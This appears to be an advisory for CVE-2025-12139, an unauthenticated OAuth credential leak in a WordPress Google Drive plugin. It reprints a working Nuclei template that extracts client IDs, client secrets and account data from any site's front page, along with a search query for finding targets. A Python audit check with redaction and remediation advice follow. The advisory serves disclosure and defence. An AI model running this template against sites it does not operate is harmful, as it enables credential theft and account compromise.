CVE-2025-12139: Integrate Google Drive <= 1.5.3 - Information Disclosure

Date: 2026-01-08 | Affected software: Integrate Google Drive | PoC: Public

Vulnerability Description

The File Manager for Google Drive - Integrate Google Drive with WordPress plugin for WordPress, versions <= 1.5.3, exposes sensitive information because the get_localize_data function is improperly protected. Unauthenticated attackers can extract Google OAuth credentials and account email addresses; exploitation requires no authentication.

PoC Code [Public]

id: CVE-2025-12139

info:
  name: Integrate Google Drive <= 1.5.3 - Information Disclosure
  author: Meysam Bal-afkan
  severity: high
  description: |
    File Manager for Google Drive - Integrate Google Drive with WordPress plugin for WordPress <= 1.5.3 contains sensitive information exposure caused by improper protection of the get_localize_data function, letting unauthenticated attackers extract Google OAuth credentials and account email addresses, exploit requires no authentication.
  impact: |
    Unauthenticated attackers can extract sensitive Google OAuth credentials and email addresses, risking account compromise and data theft.
  remediation: |
    Update to a version later than 1.5.3 or the latest available version.
  reference:
    - https://wordpress.org/plugins/integrate-google-drive/
    - https://github.com/Galaxy-sc/CVE-2025-12139-WordPress-Integrate-Google-Drive-Exploit
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2025-12139
    epss-score: 0.3428
    epss-percentile: 0.96836
  metadata:
    verified: true
    max-request: 1
    google-query: inurl:"/wp-content/plugins/integrate-google-drive"
  tags: cve,cve2025,wordpress,wp-plugin,exposure,token,google-drive

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "var igd")'
          - 'regex("\"clientSecret\":\"[^\"]+\"", body) || regex("\"accounts\":\"[A-Za-z0-9+/=]{20,}\"", body)'
        condition: and

    extractors:
      - type: regex
        name: client-id
        group: 1
        regex:
          - '"clientID":"(.*?)"'

      - type: regex
        name: client-secret
        group: 1
        regex:
          - '"clientSecret":"(.*?)"'

      - type: regex
        name: accounts-base64
        group: 1
        regex:
          - '"accounts":"(.*?)"'
# digest: 4a0a0047304502202b0d59834eae490b492feba4786f4875ced4b6090ec65c2cab0f186b78cd6e77022100f28e46cea239f6ba72466cf1bbd8d15bcdb3492145ac4bedd15ec4e8565c878a:922c64590222798bb761d5b6d8e72950
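
The template's matcher conditions as an offline check for auditing the rendered HTML of a site you operate, with the secret redacted in the result. This is an added example, not part of the original template; the function names, the sample bodies and the `ajaxUrl` key are constructed for illustration.

```python
import re

# Same conditions as the template's dsl matchers, applied to an HTML body.
MARKER = "var igd"
SECRET_RE = re.compile(r'"clientSecret":"([^"]+)"')
ACCOUNTS_RE = re.compile(r'"accounts":"([A-Za-z0-9+/=]{20,})"')
CLIENT_ID_RE = re.compile(r'"clientID":"(.*?)"')


def redact(value, keep=4):
    """Keep only a short prefix so reports never carry the full secret."""
    if len(value) <= keep:
        return "*" * len(value)
    return value[:keep] + "*" * (len(value) - keep)


def check_igd_exposure(status_code, body):
    """Return a finding dict if the page matches the template, else None."""
    if status_code != 200 or MARKER not in body:
        return None
    secret = SECRET_RE.search(body)
    accounts = ACCOUNTS_RE.search(body)
    if not (secret or accounts):
        return None
    client_id = CLIENT_ID_RE.search(body)
    return {
        "client_id": client_id.group(1) if client_id else None,
        "client_secret": redact(secret.group(1)) if secret else None,
        # Report only the size of the accounts blob, never its content.
        "accounts_blob_length": len(accounts.group(1)) if accounts else 0,
    }


# Constructed sample bodies (not captured from any real site).
EXPOSED = (
    '<script>var igd = {"clientID":"example-id.apps.example",'
    '"clientSecret":"EXAMPLE-SECRET-0000",'
    '"accounts":"QUJDREVGR0hJSktMTU5PUFFSU1RVVg=="};</script>'
)
CLEAN = '<script>var igd = {"ajaxUrl":"/wp-admin/admin-ajax.php"};</script>'

if __name__ == "__main__":
    print(check_igd_exposure(200, EXPOSED))
    print(check_igd_exposure(200, CLEAN))
```

A non-None result on your own front page means the OAuth client secret should be rotated in addition to updating the plugin, since the value was already publicly readable.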
